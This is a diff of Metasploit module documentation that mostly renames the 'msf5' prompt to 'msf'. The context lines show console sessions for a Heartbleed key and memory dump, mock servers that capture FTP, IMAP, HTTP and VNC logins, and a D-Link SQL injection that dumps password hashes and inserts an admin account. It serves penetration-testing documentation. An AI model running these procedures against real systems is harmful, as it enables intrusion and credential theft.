@@ -118,12 +118,12 @@ $ curl https://localhost:8443 -k With the default action of `SCAN` we can determine if the server is vulnerable or not. ``` -msf5 > use auxiliary/scanner/ssl/openssl_heartbleed -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 +msf > use auxiliary/scanner/ssl/openssl_heartbleed +msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 rhosts => 222.222.2.222 -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330 +msf auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330 rport => 44330 -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run +msf auxiliary(scanner/ssl/openssl_heartbleed) > run [+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes [*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete) @@ -140,9 +140,9 @@ watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem' ``` ``` -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS +msf auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS action => KEYS -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run +msf auxiliary(scanner/ssl/openssl_heartbleed) > run [*] 222.222.2.222:44330 - Scanning for private keys [*] 222.222.2.222:44330 - Getting public key constants... 
@@ -185,15 +185,15 @@ FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg== ### DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d ``` -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP +msf auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP action => DUMP -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run +msf auxiliary(scanner/ssl/openssl_heartbleed) > run [+] 222.222.2.222:44330 - Heartbeat response with leak, 65535 bytes [+] 222.222.2.222:44330 - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin [*] 222.222.2.222:44330 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin +msf auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin [*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin ���]�O���g�hE�_.[�MT��b��΋k�f�� @@ -354,12 +354,12 @@ Because arbitrary memory is dumped, a high volume application that uses openSSL fairly often. The `repeat` command can be used to execute the module multiple times. ``` -msf5 > use auxiliary/scanner/ssl/openssl_heartbleed -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 +msf > use auxiliary/scanner/ssl/openssl_heartbleed +msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222 rhosts => 222.222.2.222 -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP +msf auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP action => DUMP -msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run +msf auxiliary(scanner/ssl/openssl_heartbleed) > repeat -n 10 run [*] 222.222.2.222:443 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed 
diff --git a/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md b/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md index 65b336650d..ec83febfbe 100644 --- a/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md +++ b/documentation/modules/auxiliary/scanner/tftp/tftpbrute.md @@ -41,15 +41,15 @@ echo "hello world" > /srv/tftp/test.txt Now we can find the file: ``` -msf5 > use auxiliary/scanner/tftp/tftpbrute -msf5 auxiliary(scanner/tftp/tftpbrute) > set rhosts 1.1.1.1 +msf > use auxiliary/scanner/tftp/tftpbrute +msf auxiliary(scanner/tftp/tftpbrute) > set rhosts 1.1.1.1 rhosts => 1.1.1.1 -msf5 auxiliary(scanner/tftp/tftpbrute) > set verbose true +msf auxiliary(scanner/tftp/tftpbrute) > set verbose true verbose => true -msf5 auxiliary(scanner/tftp/tftpbrute) > run +msf auxiliary(scanner/tftp/tftpbrute) > run [+] Found test.txt on 1.1.1.1 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/tftp/tftpbrute) > +msf auxiliary(scanner/tftp/tftpbrute) > ``` diff --git a/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md b/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md index 901b50cdc7..e37fc756ea 100644 --- a/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md +++ b/documentation/modules/auxiliary/scanner/ubiquiti/ubiquiti_discover.md @@ -16,6 +16,6 @@ Many devices produced by Ubiquiti are affected by this issue. ``` - msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run + msf auxiliary(scanner/ubiquiti/ubiquiti_discover) > run [+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"} ``` 
diff --git a/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md b/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md index fd454c1a3e..73132f2635 100644 --- a/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md +++ b/documentation/modules/auxiliary/scanner/vxworks/urgent11_check.md @@ -19,13 +19,13 @@ ## Scenarios ``` -msf5 auxiliary(scanner/vxworks/urgent11_check) > set RHOSTS 192.168.86.1 192.168.86.2 +msf auxiliary(scanner/vxworks/urgent11_check) > set RHOSTS 192.168.86.1 192.168.86.2 RHOSTS => 192.168.86.1 192.168.86.2 -msf5 auxiliary(scanner/vxworks/urgent11_check) > set THREADS 2 +msf auxiliary(scanner/vxworks/urgent11_check) > set THREADS 2 THREADS => 2 -msf5 auxiliary(scanner/vxworks/urgent11_check) > set RPORTS 21 22 23 80 443 +msf auxiliary(scanner/vxworks/urgent11_check) > set RPORTS 21 22 23 80 443 RPORTS => 21 22 23 80 443 -msf5 auxiliary(scanner/vxworks/urgent11_check) > run +msf auxiliary(scanner/vxworks/urgent11_check) > run [*] 192.168.86.1:21 being checked [*] 192.168.86.2:21 being checked @@ -42,5 +42,5 @@ msf5 auxiliary(scanner/vxworks/urgent11_check) > run [+] 192.168.86.2:443 affected by CVE-2019-12258 [*] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(scanner/vxworks/urgent11_check) > +msf auxiliary(scanner/vxworks/urgent11_check) > ``` diff --git a/documentation/modules/auxiliary/server/capture/ftp.md b/documentation/modules/auxiliary/server/capture/ftp.md index 901110dfc2..85d10287e3 100644 --- a/documentation/modules/auxiliary/server/capture/ftp.md +++ b/documentation/modules/auxiliary/server/capture/ftp.md 
@@ -36,12 +36,12 @@ This module creates a mock FTP server which accepts credentials before throwing Server: ``` -msf5 > use auxiliary/server/capture/ftp -msf5 auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service" +msf > use auxiliary/server/capture/ftp +msf auxiliary(server/capture/ftp) > set banner "Microsoft FTP Service" banner => Microsoft FTP Service -msf5 auxiliary(server/capture/ftp) > run +msf auxiliary(server/capture/ftp) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/ftp) > +msf auxiliary(server/capture/ftp) > [*] Started service listener on 0.0.0.0:21 [*] Server started. [+] FTP LOGIN 127.0.0.1:44526 root / SuperSecret9 @@ -66,7 +66,7 @@ PASS SuperSecret9 Server: ``` -msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem +msf > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem [*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key @@ -88,10 +88,10 @@ Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: -msf5 > cat key.pem certificate.pem > selfsigned.pem +msf > cat key.pem certificate.pem > selfsigned.pem [*] exec: cat key.pem certificate.pem > selfsigned.pem -msf5 > cat /root/metasploit-framework/selfsigned.pem +msf > cat /root/metasploit-framework/selfsigned.pem [*] exec: cat /root/metasploit-framework/selfsigned.pem -----BEGIN PRIVATE KEY----- 
@@ -144,16 +144,16 @@ n9UgZH3Kq/ptE3Jw6gdj11XT1RSn5NgCutxeCEuPzUhwg3XmVL5fOASJbohQxdGb mVuIIRbrDW/sOgu2Viis -----END CERTIFICATE----- -msf5 > use auxiliary/server/capture/ftp -msf5 auxiliary(server/capture/ftp) > set srvport 990 +msf > use auxiliary/server/capture/ftp +msf auxiliary(server/capture/ftp) > set srvport 990 srvport => 990 -msf5 auxiliary(server/capture/ftp) > set ssl true +msf auxiliary(server/capture/ftp) > set ssl true ssl => true -msf5 auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem +msf auxiliary(server/capture/ftp) > set sslcert /root/metasploit-framework/selfsigned.pem sslcert => /root/metasploit-framework/selfsigned.pem -msf5 auxiliary(server/capture/ftp) > run +msf auxiliary(server/capture/ftp) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/ftp) > +msf auxiliary(server/capture/ftp) > [*] Started service listener on 0.0.0.0:990 [*] Server started. [+] FTP LOGIN 127.0.0.1:33618 admin / password123 diff --git a/documentation/modules/auxiliary/server/capture/http_basic.md b/documentation/modules/auxiliary/server/capture/http_basic.md index 50990bd9f4..819b9ccb8e 100644 --- a/documentation/modules/auxiliary/server/capture/http_basic.md +++ b/documentation/modules/auxiliary/server/capture/http_basic.md 
@@ -45,14 +45,14 @@ This module creates a mock web server which, utilizing a HTTP 401 response, prom Server: ``` -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access" +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set REALM "level_15 or view_access" REALM => level_15 or view_access -msf5 auxiliary(server/capture/http_basic) > set uripath '/cisco' +msf auxiliary(server/capture/http_basic) > set uripath '/cisco' uripath => /cisco -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: http://0.0.0.0:80/cisco [*] Local IP: http://10.1.1.1:80/cisco [*] Server started. @@ -78,7 +78,7 @@ HTTP request sent, awaiting response... 404 Not Found Server: ``` -msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem +msf > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem [*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key @@ -100,10 +100,10 @@ Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: -msf5 > cat key.pem certificate.pem > selfsigned.pem +msf > cat key.pem certificate.pem > selfsigned.pem [*] exec: cat key.pem certificate.pem > selfsigned.pem -msf5 > cat /root/metasploit-framework/selfsigned.pem +msf > cat /root/metasploit-framework/selfsigned.pem [*] exec: cat /root/metasploit-framework/selfsigned.pem -----BEGIN PRIVATE KEY----- 
@@ -155,16 +155,16 @@ NDO8po38u2ba52E56abfg0ZlFBqsua2s1TPHIyQ9iovTPMg1E5UTTGebaN6/BaMh Oj6N43ld9EONST6BhP3v1buoWHi1FMouocrUkUDuahiHoLlK4ERSUrb4uNnwko24 WdNCCmA8APA1qf2BYVqs -----END CERTIFICATE----- -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set ssl true +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set ssl true ssl => true -msf5 auxiliary(server/capture/http_basic) > set srvport 443 +msf auxiliary(server/capture/http_basic) > set srvport 443 srvport => 443 -msf5 auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem +msf auxiliary(server/capture/http_basic) > set sslcert /root/metasploit-framework/selfsigned.pem sslcert => /root/metasploit-framework/selfsigned.pem -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: https://0.0.0.0:443/4w0tML [*] Local IP: https://192.168.2.117:443/4w0tML [*] Server started. @@ -203,14 +203,14 @@ HTML Payload Injected: Server: ``` -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set uripath '/' +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set uripath '/' uripath => / -msf5 auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login" +msf auxiliary(server/capture/http_basic) > set REALM "Wordpress.com Login" REALM => Wordpress.com Login -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.2.117:80/ [*] Server started. 
@@ -244,14 +244,14 @@ document.write('<iframe width="0" height="0" src="http://' + username + ':' + Sever: ``` -msf5 > use auxiliary/server/capture/http_basic -msf5 auxiliary(server/capture/http_basic) > set uripath '/' +msf > use auxiliary/server/capture/http_basic +msf auxiliary(server/capture/http_basic) > set uripath '/' uripath => / -msf5 auxiliary(server/capture/http_basic) > set REALM "Login" +msf auxiliary(server/capture/http_basic) > set REALM "Login" REALM => Login -msf5 auxiliary(server/capture/http_basic) > run +msf auxiliary(server/capture/http_basic) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/http_basic) > +msf auxiliary(server/capture/http_basic) > [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.2.117:80/ [*] Server started. @@ -262,7 +262,7 @@ msf5 auxiliary(server/capture/http_basic) > Decoding the cookie: ``` -msf5 auxiliary(server/capture/http_basic) > irb +msf auxiliary(server/capture/http_basic) > irb [*] Starting IRB shell... [*] You are in auxiliary/server/capture/http_basic diff --git a/documentation/modules/auxiliary/server/capture/imap.md b/documentation/modules/auxiliary/server/capture/imap.md index f4aeb5483d..4c3f7c31c1 100644 --- a/documentation/modules/auxiliary/server/capture/imap.md +++ b/documentation/modules/auxiliary/server/capture/imap.md 
@@ -37,12 +37,12 @@ This module creates a mock IMAP server which accepts credentials. Server: ``` -msf5 > use auxiliary/server/capture/imap -msf5 auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready." +msf > use auxiliary/server/capture/imap +msf auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready." banner => The Microsoft Exchange IMAP4 service is ready. -msf5 auxiliary(server/capture/imap) > run +msf auxiliary(server/capture/imap) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/imap) > +msf auxiliary(server/capture/imap) > [*] Started service listener on 0.0.0.0:143 [*] Server started. [*] IMAP LOGIN 127.0.0.1:42972 metasploit@documentation.com / rapid7#1 @@ -66,7 +66,7 @@ Connection closed by foreign host. Server: ``` -msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem +msf > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem [*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem Generating a RSA private key @@ -88,10 +88,10 @@ Organization Name (eg, company) [Internet Widgits Pty Ltd]: Organizational Unit Name (eg, section) []: Common Name (e.g. server FQDN or YOUR name) []: Email Address []: -msf5 > cat key.pem certificate.pem > selfsigned.pem +msf > cat key.pem certificate.pem > selfsigned.pem [*] exec: cat key.pem certificate.pem > selfsigned.pem -msf5 > cat /root/metasploit-framework/selfsigned.pem +msf > cat /root/metasploit-framework/selfsigned.pem [*] exec: cat /root/metasploit-framework/selfsigned.pem -----BEGIN PRIVATE KEY----- 
@@ -143,16 +143,16 @@ gF+lHk+pX8GM0WvI7ypgrK956YCdmh3DULBFDu5RxVABFWrGedfNy6TKLTps0PXR l/m7Kka0n7lXnKo+IFSJ0dTooBvwaV7+4tEGuHxWJsNO+2aex9qFCuDUdBFxyWyK uBVlsY6F7EjTfWpxwyVP -----END CERTIFICATE----- -msf5 > use auxiliary/server/capture/imap -msf5 auxiliary(server/capture/imap) > set ssl true +msf > use auxiliary/server/capture/imap +msf auxiliary(server/capture/imap) > set ssl true ssl => true -msf5 auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem +msf auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem sslcert => /root/metasploit-framework/selfsigned.pem -msf5 auxiliary(server/capture/imap) > set srvport 993 +msf auxiliary(server/capture/imap) > set srvport 993 srvport => 993 -msf5 auxiliary(server/capture/imap) > run +msf auxiliary(server/capture/imap) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/imap) > +msf auxiliary(server/capture/imap) > [*] Started service listener on 0.0.0.0:993 [*] Server started. [+] IMAP LOGIN 127.0.0.1:59024 "johndoe" / "p455w0rd" diff --git a/documentation/modules/auxiliary/server/capture/mysql.md b/documentation/modules/auxiliary/server/capture/mysql.md index 2ccf3e942f..698cedbc6b 100644 --- a/documentation/modules/auxiliary/server/capture/mysql.md +++ b/documentation/modules/auxiliary/server/capture/mysql.md 
@@ -40,12 +40,12 @@ This module creates a mock MySQL server which accepts credentials. Upon receivi Server: ``` -msf5 > use auxiliary/server/capture/mysql -msf5 auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins +msf > use auxiliary/server/capture/mysql +msf auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins johnpwfile => /tmp/mysql.logins -msf5 auxiliary(server/capture/mysql) > run +msf auxiliary(server/capture/mysql) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/mysql) > +msf auxiliary(server/capture/mysql) > [*] Started service listener on 0.0.0.0:3306 [*] Server started. [+] 127.0.0.1:59604 - User: admin; Challenge: 112233445566778899aabbccddeeff1122334455; Response: 46677c2d9cac93da328c4321060c125db759925e diff --git a/documentation/modules/auxiliary/server/capture/postgresql.md b/documentation/modules/auxiliary/server/capture/postgresql.md index 17537e62eb..7b006ee5c9 100644 --- a/documentation/modules/auxiliary/server/capture/postgresql.md +++ b/documentation/modules/auxiliary/server/capture/postgresql.md @@ -25,8 +25,8 @@ This module creates a mock PostgreSQL server which accepts credentials. Upon re Server: ``` -msf5 > use auxiliary/server/capture/postgresql -msf5 auxiliary(server/capture/postgresql) > run +msf > use auxiliary/server/capture/postgresql +msf auxiliary(server/capture/postgresql) > run [*] Auxiliary module running as background job 0. [*] Started service listener on 0.0.0.0:5432 diff --git a/documentation/modules/auxiliary/server/capture/printjob_capture.md b/documentation/modules/auxiliary/server/capture/printjob_capture.md index 78623d6449..bbf61b00cc 100644 --- a/documentation/modules/auxiliary/server/capture/printjob_capture.md +++ b/documentation/modules/auxiliary/server/capture/printjob_capture.md 
@@ -37,20 +37,20 @@ This module creates a mock print server which accepts print jobs. Server: ``` -msf5 > use auxiliary/server/capture/printjob_capture -msf5 auxiliary(server/capture/printjob_capture) > run +msf > use auxiliary/server/capture/printjob_capture +msf auxiliary(server/capture/printjob_capture) > run [*] Auxiliary module running as background job 0. [*] Starting Print Server on 0.0.0.0:9100 - RAW mode [*] Started service listener on 0.0.0.0:9100 [*] Server started. -msf5 auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678 +msf auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678 [*] Printjob Capture Service: Client 127.0.0.1:44678 closed connection after 249 bytes of data [-] Unable to detect printjob type, dumping complete output [+] Incoming printjob - Unnamed saved to loot [+] Loot filename: /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin -msf5 auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin +msf auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin [*] exec: cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin PRETTY_NAME="Kali GNU/Linux Rolling" diff --git a/documentation/modules/auxiliary/server/capture/smtp.md b/documentation/modules/auxiliary/server/capture/smtp.md index 2a606bd043..bba2de7455 100644 --- a/documentation/modules/auxiliary/server/capture/smtp.md +++ b/documentation/modules/auxiliary/server/capture/smtp.md @@ -155,7 +155,7 @@ Testing: RSET during middle of DATA RSET [*] SMTP: 127.0.0.1:46222 EMAIL: testing a message which gets cancelled Response: 250 OK -msf5 auxiliary(server/capture/smtp) > creds +msf auxiliary(server/capture/smtp) > creds Credentials =========== 
@@ -165,7 +165,7 @@ host origin service public private 127.0.0.1 127.0.0.1 25/tcp (smtp) username_login password_login Password 127.0.0.1 127.0.0.1 25/tcp (smtp) username_plain password_plain Password -msf5 auxiliary(server/capture/smtp) > notes +msf auxiliary(server/capture/smtp) > notes Notes ===== diff --git a/documentation/modules/auxiliary/server/capture/telnet.md b/documentation/modules/auxiliary/server/capture/telnet.md index ef4836b7f8..a0cdf5e448 100644 --- a/documentation/modules/auxiliary/server/capture/telnet.md +++ b/documentation/modules/auxiliary/server/capture/telnet.md @@ -28,10 +28,10 @@ This module creates a mock telnet server which accepts credentials. Upon receiv Server: ``` -msf5 > use auxiliary/server/capture/telnet -msf5 auxiliary(server/capture/telnet) > run +msf > use auxiliary/server/capture/telnet +msf auxiliary(server/capture/telnet) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/telnet) > +msf auxiliary(server/capture/telnet) > [*] Started service listener on 0.0.0.0:23 [*] Server started. [+] TELNET LOGIN 127.0.0.1:40016 root / <3@wvu_is_my_hero diff --git a/documentation/modules/auxiliary/server/capture/vnc.md b/documentation/modules/auxiliary/server/capture/vnc.md index 7f74ef4eb8..4f5a7bbb63 100644 --- a/documentation/modules/auxiliary/server/capture/vnc.md +++ b/documentation/modules/auxiliary/server/capture/vnc.md 
@@ -32,17 +32,17 @@ This module creates a mock VNC server which accepts credentials. Upon receiving Server, Client: ``` -msf5 > use auxiliary/server/capture/vnc -msf5 auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc -msf5 auxiliary(server/capture/vnc) > set johnpwfile /tmp/john +msf > use auxiliary/server/capture/vnc +msf auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc +msf auxiliary(server/capture/vnc) > set johnpwfile /tmp/john johnpwfile => /tmp/john -msf5 auxiliary(server/capture/vnc) > run +msf auxiliary(server/capture/vnc) > run [*] Auxiliary module running as background job 0. -msf5 auxiliary(server/capture/vnc) > +msf auxiliary(server/capture/vnc) > [*] Started service listener on 0.0.0.0:5900 [*] Server started. -msf5 auxiliary(server/capture/vnc) > vncviewer 127.0.0.1 +msf auxiliary(server/capture/vnc) > vncviewer 127.0.0.1 [*] exec: vncviewer 127.0.0.1 Connected to RFB server, using protocol version 3.7 @@ -56,7 +56,7 @@ Authentication failure John the Ripper (JTR) Cracker: ``` -msf5 auxiliary(server/capture/vnc) > john /tmp/john_vnc +msf auxiliary(server/capture/vnc) > john /tmp/john_vnc [*] exec: john /tmp/john_vnc Using default input encoding: UTF-8 diff --git a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md index c8056be03f..cd688af0eb 100644 --- a/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md +++ b/documentation/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.md @@ -35,7 +35,7 @@ Has been tested with 1.03r098. ## Actions ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show actions Auxiliary actions: 
@@ -50,7 +50,7 @@ Auxiliary actions: ## Options ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > show options Module options (auxiliary/sqli/dlink/dlink_central_wifimanager_sqli): @@ -74,15 +74,15 @@ This module has both `check` and `run` functions. ### Retrieving all the data from the database ``` -msf5 > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP +msf > use auxiliary/sqli/dlink/dlink_central_wifimanager_sqli +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action SQLI_DUMP action => SQLI_DUMP -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223 +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set rhosts 192.168.1.223 rhosts => 192.168.1.223 -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > check [+] 192.168.1.223:443 - The target is vulnerable. -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [+] Target seems vulnerable @@ -103,8 +103,8 @@ msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [+] devicesnmpsecuritytable saved to /home/redouane/.msf4/loot/20200828180154_default_192.168.1.223_dlink.http_825556.csv [*] Auxiliary module execution completed -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > creds Credentials =========== 
@@ -113,8 +113,8 @@ host origin service public private realm 192.168.1.223 admin 21232f297a57a5a743894a0e4a801fc3 Nonreplayable hash raw-md5 192.168.1.223 red0xff f0e166dc34d14d6c228ffac576c9a43c Nonreplayable hash raw-md5 -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > loot Loot ==== 
@@ -129,44 +129,44 @@ host service type name content ult_192.168.1.223_dlink.http_878195.csv 192.168.1.223 dlink.http devicesnmpsecuritytable.csv application/csv /home/redouane/.msf4/loot/20200828180506_default_192.168.1.223_dlink.http_086271.csv -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > ``` ### Adding an admin user/changing the password of a user ``` -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set action ADD_ADMIN action => ADD_ADMIN -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Username msfadmin Admin_Username => msfadmin -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfadmin Admin_Password => msfadmin -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [+] Target seems vulnerable [*] User not found on the target, inserting [*] Auxiliary module execution completed -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > set Admin_Password msfpassword Admin_Password => msfpassword -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > run [*] Running module against 192.168.1.223 [*] Trying to detect installed version [+] Target seems vulnerable [*] User already exists, updating the password [*] Auxiliary module execution completed -msf5 auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > +msf auxiliary(sqli/dlink/dlink_central_wifimanager_sqli) > ``` ### Deleting an administrator 
